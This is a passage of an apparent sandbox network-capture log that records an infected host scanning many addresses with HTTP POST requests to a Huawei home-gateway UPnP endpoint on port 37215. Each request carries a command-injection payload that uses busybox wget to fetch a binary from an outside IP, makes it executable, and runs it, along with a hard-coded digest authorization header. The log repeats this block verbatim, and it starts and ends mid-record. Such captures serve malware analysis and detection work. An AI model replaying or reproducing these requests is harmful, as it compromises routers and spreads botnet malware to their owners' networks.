2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2278192.168.2.153456041.28.150.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673578024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2279192.168.2.153517641.129.237.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673578024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2280192.168.2.155820641.141.129.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673583031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2281192.168.2.153782841.157.70.16337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673610926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2282192.168.2.154013241.142.230.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673643112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2283192.168.2.154712441.55.129.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673643112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2284192.168.2.155238641.50.248.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673747063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2285192.168.2.154903841.186.113.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673763990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2286192.168.2.155410641.43.76.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673765898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2287192.168.2.153916641.201.31.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673787117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2288192.168.2.155130641.167.66.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673794985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
